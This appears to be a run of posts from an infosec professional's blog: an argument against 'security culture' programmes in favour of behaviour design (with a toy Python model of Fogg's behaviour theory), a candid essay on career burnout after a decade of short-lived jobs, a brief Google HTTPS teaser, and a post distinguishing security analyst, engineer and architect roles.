First and foremost, you're probably sitting there grinding your teeth saying "But safety culture initiatives work really well!" Yes, they do, but here's why: safety culture can - and often does - achieve a zero-incident outcome. That is to say, you can reduce safety incidents to ZERO. This is excellent when you're around construction sites or going to the hospital. However, I have very bad news for you: information (or cyber, or computer) security will never get to zero. Until the entirety of computing is revolutionized, removing humans from the equation, you will never prevent all incidents. Just imagine your "security culture" sign by the entrance to your local office environment, forever emblazoned with "It Has Been 0 Days Since Our Last Incident." That's not healthy or encouraging. That sort of thing would be outright demoralizing!

Since you can't be 100% successful through preventative security practices, you must shift your mindset to a couple of things: better decisions and resilience. Your focus - which most "security culture" programs are trying to address (or should be) - is helping people make better decisions. Well, I should say, some of you - the few, the proud, the quietly isolated - have this focus. But at the end of the day/week/month/year you'll find that people - including well-trained and highly technical people - will still make mistakes or bad decisions, which means you can't bank on "solving" infosec through better decisions.

As a result, we must still architect for resiliency. We must assume something will break down at some point, resulting in an incident. When that incident occurs, we must be able to absorb the fault and continue to operate despite degraded conditions, while recovering to "normal" as quickly, efficiently, and effectively as possible. Note, however, that this focus on resiliency doesn't really align well with the "security culture" message. It's akin to telling people "Safety is really important, but since we have no faith in your ability to be safe, here's a first aid kit." (Yes, that's a bit harsh, to prove a point - which hopefully you're getting.)

2) Once Again, It Creates an "Other"

One of the biggest problems with a typical "security culture" focus is that it once again creates the wrong kind of enablement culture. It says "we're from infosec and we know best - certainly better than you." Why should people work to make better decisions when they can just abdicate that responsibility to infosec? Moreover, since we're trying to optimize resiliency, people can go ahead and make mistakes, no big deal, right?

Part of this is ok, part of it is not. On the one hand, from a DevOps perspective, we want people to experiment, be creative, be innovative. In this sense, resilience and failure are a good thing. However, note that in DevOps, the responsibility for "fail fast, recover fast, learn fast" is on the person doing the experimenting!!! The DevOps movement is diametrically opposed to fostering enablement cultures where people (like developers) don't feel the pain from their bad decisions. It's imperative that people have ownership and responsibility for the things they're doing. Most "security culture" dogma I've seen and heard works against this objective.

We want enablement, but we don't want enablement culture. We want "freedom AND responsibility," "accountability AND transparency," etc, etc, etc. Pushing "security culture" keeps these initiatives separate from other organizational development initiatives, and more importantly it tends to have at best a temporary impact, rather than triggering lasting behavioral change.

3) Your Goal Is Improving the Organization

The last point here is that your goal should be to improve the organization and the overall organizational culture. It should not be focused on point-in-time blips that come and go. Additionally, your efforts must be aimed toward lasting impact and not be anchored around a cult of personality.

As a starting point, you should be working with org dev personnel within your organization, applying behavior design principles. You should be identifying what the target behavior is, then working backward in a piecemeal fashion to determine whether that behavior can be evoked and institutionalized through one step or multiple steps. It may even take years to accomplish the desired changes.

Another key reason for working with your org dev folks is because you need to ensure that anything "culture" that you're pursuing is fully aligned with other org culture initiatives. People can only assimilate so many changes at once, so it's often better to align your work with efforts that are already underway in order to build reinforcing patterns. The worst thing you can do is design for a behavior that is in conflict with other behavior and culture designs underway.

All of this is to underline the key point that "security culture" is the wrong focus, and can in some cases even detract from other org culture initiatives. You want to improve decision-making, but you have to do this one behavior at a time, and glossing over it with the "security culture" label is unhelpful.

Lastly, you need to think about your desired behavior and culture improvements in the broader context of organizational culture. Do yourself a favor and go read Laloux's Reinventing Organizations for an excellent treatise on a desirable future state (one that aligns extremely well with DevOps). As you read Laloux, think about how you can design for security behaviors in a self-managed world. That's the lens through which you should view things, and this is where you'll realize a "security culture" focus is at best distracting.

---
So... where should you go from here? The answer is three-fold:
1) Identify and design for desirable behaviors
2) Work to make those behaviors easy and sustainable
3) Work to shape organizational culture as a whole

Definitionally, here are a couple starters for you...

First, per Fogg, behavior happens when three things come together: Motivation, Ability (how hard or easy the action is to do), and a Trigger (a prompt or cue). When motivation is high and the action is easy, it doesn't take much prompting to trigger it. However, if the action is difficult, or the motivation simply isn't there, you must start looking for ways to address those factors in order to achieve the desired behavioral outcome once triggered. This is the basis of behavior design.
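For the technically inclined, that relationship can be sketched as a toy threshold model. This is purely illustrative: the 0-to-1 scales, the additive "action line," and the function name are inventions for the sketch, not part of Fogg's formal model.

```python
# Illustrative sketch of the Fogg Behavior Model: a behavior occurs
# when a trigger (prompt) arrives while the combination of motivation
# and ability sits above an "action line." Scales and threshold are
# invented for illustration only.

def behavior_occurs(motivation: float, ability: float, prompted: bool,
                    action_line: float = 1.0) -> bool:
    """Return True if the prompted behavior happens.

    motivation, ability: 0.0 (none) to 1.0 (high). They compensate
    for each other: an easy action needs little motivation, and a
    highly motivated person will attempt a hard action.
    """
    if not prompted:
        return False  # no trigger, no behavior, regardless of the rest
    return motivation + ability >= action_line

# High motivation and an easy action: a prompt is enough.
print(behavior_occurs(0.9, 0.8, prompted=True))   # True
# Hard action and low motivation: the prompt fails.
print(behavior_occurs(0.2, 0.3, prompted=True))   # False
# No prompt at all: nothing happens.
print(behavior_occurs(1.0, 1.0, prompted=False))  # False
```

The design takeaway mirrors the prose: if the prompt keeps failing, you don't keep prompting harder; you raise motivation or (usually cheaper) make the action easier.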

Second, when you think about culture, think of it as the aggregate of behaviors collectively performed by the organization, along with the values the organization holds. It may be helpful, as Laloux suggests, to think of the organization as its own person that has intrinsic motivations, values, and behaviors. Eliciting behavior change from the organization is, then, tantamount to changing the organizational culture.

If you put this all together, I think you'll agree with me that talking about "security culture" is anathema to the desired outcomes. Thinking about behavior design in the context of organizational culture shift will provide a better path to improvement, while also making it easier to explain the objectives to non-security people and to get buy-in on lasting change.

Bonus reference: You might find this article interesting as it pertains to evoking behavior change in others.

Good luck!

Confessions of an InfoSec Burnout

Soul-crushing failure.

If asked, that is how I would describe the last 10 years of my career, since leaving AOL.

I made one mistake, one bad decision, and it's completely and thoroughly derailed my entire career. Worse, it's unclear if there's any path to recovery as failure piles on failure piles on failure.

The Ground I've Trod

To understand my current state of career decrepitude, as well as how I've seemingly become an industry pariah...

I have worked for 11 different organizations over the past 10 years. I left AOL in September 2007, right before a layoff (I should have waited for the layoff and gotten a package!). I had been there for more than 3.5 years and I was miserable. It was a misery of my own making in many ways. My team manager had moved up the ranks, leaving an opening. All my teammates encouraged me to throw my hat in the ring, but I demurred, telling myself I simply wasn't ready to manage. Oops. Instead, our new manager came through an internal process, and immediately made life un-fun. I left a couple months later.

When I left AOL, it was to take a regional leadership role in BT-INS (BT Global Services - they bought International Network Services to build out their US tech consulting). A month into the role as security lead for the Mid-Atlantic, where I was billable on day 1, the managing director left and a re-org merged us into a different region that already had a security lead. Two of the three sales reps left, and the remaining person was unable and unwilling to sell security. I sat on the bench for a long time, traveling as needed. An idle, bored Ben is a bad thing.

From BT I took a leadership role with this weird tech company in Phoenix. There was no budget and no staff, but I was promised great things. They let me start remote for a couple months before relocating. I knew it was a bad fit and not a good company before we made the move. I could feel it in my gut. But, I uprooted the family in the middle of the school year (my wife is an elementary teacher) and went to Phoenix, ignoring my gut. 6 months later they eliminated the position. The fact is that they'd hired a new General Counsel who also claimed a security background (he had a CISSP), and thus they made him the CISO. The year was 2009, the economy was in tatters after the real estate bubble had burst. We were stranded in a dead economy and had no place to go.

Thankfully, after a month of searching, someone threw me a life-line and I promptly started a consulting gig with Foreground Security. Well, that was a complete disaster and debacle. We moved back to Northern Virginia and my daughter immediately got sick and ended up in the hospital (she'd hardly had a sniffle before!). By the time she got out of the hospital I was sicker than I'd ever been before. The doctors had me on a couple different antibiotics and I could hardly get out of bed. This entire time the president of the company would call and scream at me every day. Literally, yelling at the top of his lungs over the phone. Hands-down the most unprofessional experience I'd had. The company partnership subsequently fell apart and I was cut loose in the process. I remember it clearly to this day: I'm at my parents' house in NW MN over the winter holidays and the phone rings. It's the company president, who starts out by telling me they'd finally had the kid they were expecting. And, they're letting me go. Yup, that's how the conversation went ("We had a baby. You're termed.").

Really, being out of Foreground was a relief given how awful it had been. Luckily, they'd relocated us with no strings attached, so I didn't owe anything. But I was once again out of a job, for the second time in three months. I'd had three employers in 2009 and ended the year unemployed.

In early 2010 I was able to land a contract gig, thinking I'd try a solo practice. It didn't work out. The client site was in Utah, but they didn't want to pay for a ton of travel, so I tried working remotely, but people refused to answer the phone or emails, meaning I couldn't do the work they wanted. The whole situation was a mess.

Finally, I connected with Peter Hesse at Gemini Security Solutions for a contract-to-hire tryout. His firm was small, but had a nice contract with a large client that helped underpin his business. He brought me in to do a mix of consulting and biz dev, but after a year-plus of trying to bring in new opportunities (and having them shot down internally for various reasons), I realized that I wasn't going to be able to make a difference there. Plus, being reminded almost daily that I was an expensive resource didn't help. I worked my butt off, but in the end it was unappreciated, so I left for LockPath.

The co-founders of LockPath had found me when I was in Phoenix thanks to a paper I'd written on PCI for some random website. They came out to visit me and told me what they were up to. I kept in touch with them over the years, including through their launch of Keylight 1.0 on 10/10/10. I somewhat forced my way into a role with them, initially to build a pro svcs team, but that got scrapped almost immediately and I ended up more in a traveling role, presenting at conferences to help get the name out there, as well as doing customer training. After a year-and-a-half of doing this, they hired a full-time training coordinator who immediately threw me under the bus (it was a major wtf moment). They wanted to consolidate resources at HQ and moving to Kansas wasn't in the cards, so seeing the writing on the wall I started a job search. Things came to an end in mid-May while I was on the road for them. I remember it clearly, having dropped my then-3yo daughter with the in-laws the night before, I had just gotten into my hotel room in St. Paul, MN, ahead of Secure360 and the phone rang. I was told it was over, but he was going to think about it overnight. I asked "Am I still representing the company when I speak at the conference tomorrow?" and got no real answer, but was promised one first thing the next morning. That call never came, so I spoke to a full room the next morning and worked the booth all that day and the morning after that. I met my in-laws for lunch to pick-up my kiddo, and was sitting in the airport awaiting our flight home when the call finally came in delivering the final news. I was pretty burned-out at that time, so in many ways it was welcome news. Startup life can be crazy-intense, and I thankfully maintain a decent relationship with the co-founders today. But those days were highly stressful.

The good news was that I was already in-process with Gartner, and was able to close on the new gig a couple weeks later. Thus started what I thought would be one of my last jobs. Alas, I was wrong. As was much with my time there.

Before I go any further, an important observation bears noting: the onboarding experience is all-important. If you screw it up, it sets a horrible tone for the entire gig, and the likelihood of success drops significantly. If onboarding is professional and goes smoothly, people will feel valued and able to contribute. If it goes poorly, people will feel undervalued from the get-go and they will literally start from an emotional hole. Don't do this to people! I don't care if you're a startup or a Fortune 50 large multi-national. Take care of people from Day 1 and things will go well. Fail at it and you might as well stop and release them asap.

Ok, anyway... back to Gartner. It was a difficult beginning. I was assigned a mentor, per their process, but he was gone for 6 of my first 9 weeks there. I was sent to official "onboarding training" at the end of August, despite having been there for 2 months by that time. I was not prepped at all beforehand, and as it turns out I should have been. Others showed up with documents to be edited and an understanding of the process. I showed up completely stressed out, not at all ready to do the work that was expected, and generally had a very difficult time. It was also the week before Labor Day, which at the time meant teacher workshops for my wife, and I was on the road for it with 2 young kids at home. Thankfully, the in-laws came and helped out, but suffice to say it was just really not good all-around.

I really enjoyed the manager I worked for initially, but all that changed in February 2014 when my former mentor, with whom I did not at all get along, became the team manager. The stress levels immediately spiked as the focus quickly shifted to strong negativity. I had been struggling to get paper topics approved and was fighting against the reality that the target audience for Gartner research is not the leading edge of thinking, but the middle of the market. It took me nearly a full year to finally get my feet under me and start producing at an appropriate pace. My 1 yr mark roughly corresponded with the mid-year review, which was highly negative. By the end of the year I finally found my stride and had a ton of research in the pipeline (most of which would publish in early 2015). Unfortunately, the team manager, Captain Negative, couldn't see that and gave me one of the worst performance reviews I've ever received. It was hands-down the most insulted I'd ever been by a manager. It seemed very clear from his disrespectful actions that I wasn't wanted there, and so I launched an intensive job search. Meanwhile, I published something like 4 papers in 6 weeks while also having 4 talks picked up for that year's Security & Risk Management Conference. All I heard from my manager was negativity despite all that progress and success. I felt like shit, a total failure. There were no internal opportunities, so outward I looked, eventually landing at K12.

Oh, what a disaster that place was. K12 is hands-down the most toxic environment I've ever seen (and I've seen a lot!). Literally, all 10 people with whom I'd interviewed had lied to me - egregiously! I'd heard rumblings of changes in the executive ranks, but the hiring manager assured me there was nothing that would affect me. A new CIO - my manager's boss - started the same day I did. Yup, nothing that would affect me. Ha. Additionally, it turns out that they already had a "security manager" of sorts working in-house. He wasn't part of the interview process for my "security architect" role. They said they were doing DevOps, but it was just a side pilot that wasn't getting anywhere. Etc. Etc. Etc. Suffice to say, it was really bad. I frankly wondered how they were still in business, especially in light of the constant stream of lawsuits emanating from the states where they had "online public schools." Oy...

Suffice to say, I started looking for work on Day 1 at K12. But there wasn't much out there, and recruiters were loath to talk to me given such a short stint. Explanations weren't accepted, and I was truly stuck. The longer I was there, the worse it looked. Finally, my old manager from AOL reached out as he was starting a CISO role at Ellucian. He rescued me, and in October 2015 I started with them in a security architect role.

There's not much I can say about my experience at Ellucian. Things seemed ok at first, but after a CIO change a few months in, plus a couple other personnel issues, things got wonky, and it became clear my presence was no longer desired. When your boss starts cancelling weekly 1-on-1 meetings with you, it becomes pretty clear that he doesn't really want you there. New Context reached out in May 2016 and offered me an opportunity to do research and publishing for them, so I jumped at it and got the heck out of dodge. It turns out, this was a HUGE mistake, too...

There's even less I can say about New Context... we'll just put it at this: Despite my best efforts, I was never able to get things published due to a lack of internal approvals. After a year of banging my head against the wall, my boss and I concluded it wasn't going to happen, and they let me go a couple weeks later.

From there, I launched my own solo practice and signed what was to be a 20-week contract with an LA-based client. They had been chasing me for several months to come help them out in a consulting (staff augmentation, really) capacity. I closed the deal with them and started on July 31st of this year. That first week was a mess, with them not being ready for me on day 1, then sending me a botched laptop build on day 2, and finally getting me online on day 3. I flew to LA to be on-site with them the following week and immediately locked horns with the other security architect. That first week on-site was horribly stressful. Things had finally started leveling off last week, and then yesterday (Monday, 8/28/17) they called and cancelled the contract. While I'm disappointed, it's also a bit of a relief. It wasn't a good fit, it was a very difficult client experience, and overall I was actively looking for new opportunities while I did what I could for them.

Shared Culpability or Mea Culpa?

After all these years, I'm tired of taking the blame and being the seemingly constant punchline to some joke I don't get. I'm tired, I'm burned-out, I'm frustrated, I'm depressed, and more than anything I just don't understand why things have gone so completely wrong over the past 10 years. How could one poor decision result in so much career chaos and heartache? It's astonishing. And appalling. And depressing.

I certainly share responsibility in all of this. I tend to be a fairly high-strung person (less so over the years) and onboarding is always highly stressful for me. Increasingly, employers want you engaged and functional on Day 1, even though that is incredibly unrealistic. Onboarding must be budgeted for a minimum of 3-6 months. If a move is involved, then even longer! Yet nobody is willing to allow that any more. I don't know if it's mythology or downward pressure or what... but the expectations are completely unreasonable.

But I do have a responsibility here, and I've certainly not been Mr. Sunshine the past few years. I tend to come off as extremely negative and sarcastic, which can be off-putting to people. Attitude is something I need to focus on when starting, and I need to find ways to better manage all the stress that comes with commencing a new gig.

That said, I also seem to have a knack for picking the wrong jobs. This even precedes my time at AOL, which is really a shining anchor in the middle of a turbulent career. Coming into the workforce just before the DOT-COM bubble burst, I've been through lots of layoffs and turmoil. I simply have a really bad track record of making good employment choices. I'm not even sure how to go about fixing that, short of finding people to advise me on the process.

However, lastly, it's important for companies to realize that they're also failing employees. The onboarding process is immensely important. Treating people respectfully and mindfully from Day 1 is immensely important. Setting reasonable expectations is immensely important. If you do not actively work to set your personnel up for success, then it is extremely unlikely that they'll achieve it! And even in this day and age where companies really, truly don't value personnel (except for execs and directors), it must be acknowledged that there is a significant cost in lost productivity, efficiency, and effectiveness that can be directly tied to employee turnover. This includes making sure managers are reasonably well trained and are actually well-suited to being managers. You owe it to your employees to treat them as humans, not just replaceable cogs in a machine.

Where To Go From Here?

The pull of deep depression is ever stronger. Resistance becomes ever more difficult with each successive failure. I feel like I cannot buy a break. My career is completely off-track, and I see less and less of a path to recovery. Every morning is a struggle to get up and look for work yet again. I feel like I've been doing this almost constantly for the past 10 years. I've not been settled anywhere since AOL (maybe BT).

I initially launched a solo practice, Falcon's View Consulting, to handle some contracts. And, that's still out there if I need it. However, what I really need is a full-time job. With a good, stable company. In a role with a good manager. A role that eventually has upward mobility (in order to get back on track).

Where that role is based I really do not care (my family might). Put me in a leadership role, pay me a reasonable salary, and relocate me to where you need me. At this point, I'm willing to go to bat and force the family to move, but you gotta make it easy and compelling. Putting me into financial hardship won't get it done. Putting me into a difficult position with no support won't get it done. Moving me and not being committed to keeping me onboard through the most stressful times won't get it done.

I'm quite seriously at the end of my rope. I feel like I have about one more chance left, after which it'll be bankruptcy and who knows what... I've given just about everything I can to this industry, and my reward has been getting destroyed in the process. This isn't sustainable, it isn't healthy, and it's altogether stupid.

I want to do good work. I want to find an employer that values me, one I can stay with for a reasonable period of time. I've never gone into any FTE role thinking "this is just a temporary stop while I find something better." I throw my whole self into my work, which is - I think - why it is so incredibly painful when rejection and failure finally happen. But I don't know another way to operate. Nor should anyone else, for that matter.

Two roads diverged in the woods / And I... I took the wrong one / And that has made all the difference

Google Begins Campaign Warning Forms Not Using HTTPS Protocol

In August 2014, Google released an article sharing their thoughts on how they planned to focus on their “HTTPS everywhere” campaign (originally initiated at their Google I/O event). The premise of...


The post Google Begins Campaign Warning Forms Not Using HTTPS Protocol appeared first on PerezBox.

On Titles, Jobs, and Job Descriptions (Not All Roles Are Architects)

Folks: Please stop calling every soup-to-nuts, everything-but-the-kitchen-sink security job a "security architect" role. It's harmful to the industry and it's doing you no favors trying to find the right resources. In fact, please stop posting these "one role does everything security under the sun" positions altogether. It's hurting your recruitment efforts, and it makes it incredibly difficult to find positions that are a good fit. Let me explain...

For starters, there are generally three classes of security people, management and pentesters aside:
- Analysts
- Engineers
- Architects

(Note that these terms tend to be loaded due to their use in other industries. In fact, in some states you might even have to come up with a different equivalent term for positions due to legal definitions (or licensing) of roles. Try to bear with me and just go with the flow, eh?)

Analysts are people who think about stuff and write about stuff and sometimes help initiate actions, but they are not the implementers of security tools or practices. An analyst may or may not be particularly technical, depending on the nature of the role. For example, there are tons of entry-level SOC analyst positions today that can provide a first taste of infosec work life. You rarely need to have a lot of technical skills, at least initially, to land one of these gigs (this varies by org). Similarly, there are GRC analyst roles that tend not to be technical at all (despite often including "technical writing," such as for policies, in the workload). On the far end of the spectrum, you may have incident response (IR) analysts who are very technical, but again note the nature of their duties: thinking about stuff, writing about stuff, and maybe initiating actions (such as the IR process or escalations therein).

Engineers are people who do most of the hands-on work. If you're looking for someone to do a bunch of implementation work, particularly around security tools and tech, then you want a security engineer, and that should be clearly stated in your job description. Engineers tend to be people who really enjoy implementation and maintenance work. They like rolling up their sleeves and getting their hands dirty. You might also see "administrator" used in this same category (though that's muddy water as sometimes a "security administrator" might be more like an analyst in being less technical, skilled in one kind of tool, like adding and removing users to Active Directory or your IAM of choice). In general, if you're listing a position that has implementation responsibilities, then you need to be calling it an engineer role (or equivalent), not an analyst and certainly not an architect.

Architects are not your implementers. And, while they are thinkers who may do a fair amount of technical writing, the key differentiators here are that 1) they tend to be way more technical than the average analyst, 2) they see a much bigger picture than the average analyst or engineer, and 3) they've often risen to this position through one or both of the other roles, almost certainly with considerable hands-on implementation experience as an engineer. It's very important to understand that your architects, while likely having a background in engineering, are unlikely to want to do much hands-on implementation work. What hands-on work they are willing and interested in doing is likely focused heavily on proofs of concept (POCs) and testing new ideas and technologies. Given their technical backgrounds, they'll be able to go toe-to-toe on technical topics with just about anyone in the organization, even though they may not be able to sit down and crank out a bunch of server builds in short order any more (or, maybe they can!). A good security architect provides experiential, context-relevant guidance on how to design /secure/ systems and applications, as well as guidance on technology purchasing decisions, technical designs, etc. Where they differ from, say, GRC/policy analysts is that when they provide a recommendation, they can typically back it up with more than a flaccid reference to "best practices" or some other lame appeal to authority; they can point to proven experience and technical rationale.

Going all the way back to before my Gartner days, I've long told SMBs that their first step should not be hiring a security manager, but rather a security architect who reports up through the IT food chain, preferably directly to the IT manager/director or CIO (depending on the size and structure of the org). The reason for this recommendation is that small IT shops already have a number of engineers/administrators and analysts, but what they oftentimes lack is someone with broad AND deep technical expertise in security who can provide all sorts of guidance and value to the organization. Part and parcel to this is that SMBs especially do not need to build out a "security team" or "security department"! (In fact, I often argue only the largest enterprises should ever go this route, and only to improve efficiency and effectiveness. Status quo and conventional wisdom be damned.) Most small IT shops just need someone to help out with decisions and evaluations to ensure that the organization is making smart security decisions. This security architect role should not be focused on implementation or administration, but instead should serve in an almost quasi-EA (enterprise architect) role that cuts across the entire org. In many ways, a security architect is a counselor who works with teams to improve their security decisions. It's common in larger organizations for security architects to focus on one part of the business simply as a matter of scale and supportability.

So that's it. Nothing too crazy, right? But, I think it's important. Yes, some of you may debate and question how I've defined things, and that's fine, but the main takeaway here, hopefully, is that job descriptions need to be reset again around some standard language. In particular, orgs need to stop listing a ton of implementation work for "security architect" roles because that's misleading and really not what a security architect does. Properly titling and describing roles is very important, and will help you more readily find your ideal candidates. Calling everything a "security architect" does not do anything positive for you, and it serves to frustrate and disenfranchise your candidate pools (not to mention wasting your time on screening).

fwiw. ymmv. cheers!